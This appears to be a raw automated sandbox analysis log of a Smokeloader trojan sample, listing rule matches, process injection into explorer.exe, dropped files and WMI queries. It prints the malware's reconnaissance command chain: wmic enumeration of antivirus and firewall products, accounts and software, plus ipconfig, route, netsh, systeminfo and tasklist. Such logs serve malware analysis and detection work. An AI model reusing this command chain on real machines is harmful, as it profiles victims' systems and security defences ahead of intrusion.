                Source: 00000004.00000002.2365240792.0000000002530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000007.00000002.2900483247.00000000025B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@61/15@5/4
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_0266F92E CreateToolhelp32Snapshot,Module32First,0_2_0266F92E
                Source: C:\Users\user\AppData\Local\Temp\B575.exeCode function: 8_2_00007FF7CB877138 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,8_2_00007FF7CB877138
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\esjbbriJump to behavior
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E647.tmpJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                Source: KTh1gQlT9a.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process
                Source: C:\Users\user\AppData\Local\Temp\B575.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Local\Temp\B575.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, CommandLine, ExecutablePath, ProcessId FROM Win32_Process
                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;92&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;332&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;420&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;496&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;504&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;564&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;632&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;640&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;752&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;780&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;788&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;872&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;924&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;992&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;444&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;732&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;280&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1032&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1056&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1068&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1148&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1188&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1232&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1324&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1384&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1416&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1424&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1460&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1584&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1612&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1660&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1688&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1700&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1820&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1836&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1936&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1944&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1952&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2024&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2096&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2152&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2188&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2204&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2240&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2392&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2400&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2440&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2484&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2492&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2528&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2588&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2596&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2628&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2768&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2868&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2932&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3260&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3512&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3696&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3756&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3984&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2456&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4132&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4800&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4572&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5152&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5932&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6708&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6792&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6836&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6960&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3584&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5864&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2672&quot;::GetOwner
                Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 6D5F.tmp.9.dr, 69D1.tmp.9.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: KTh1gQlT9a.exeReversingLabs: Detection: 34%
                Source: unknownProcess created: C:\Users\user\Desktop\KTh1gQlT9a.exe "C:\Users\user\Desktop\KTh1gQlT9a.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\esjbbri C:\Users\user\AppData\Roaming\esjbbri
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E647.exe C:\Users\user\AppData\Local\Temp\E647.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\uejbbri C:\Users\user\AppData\Roaming\uejbbri
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B575.exe C:\Users\user\AppData\Local\Temp\B575.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeProcess created: C:\Windows\System32\cmd.exe cmd
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E647.exe C:\Users\user\AppData\Local\Temp\E647.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B575.exe C:\Users\user\AppData\Local\Temp\B575.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csvJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csvJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csvJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydnsJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route printJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show stateJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csvJump to behavior
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
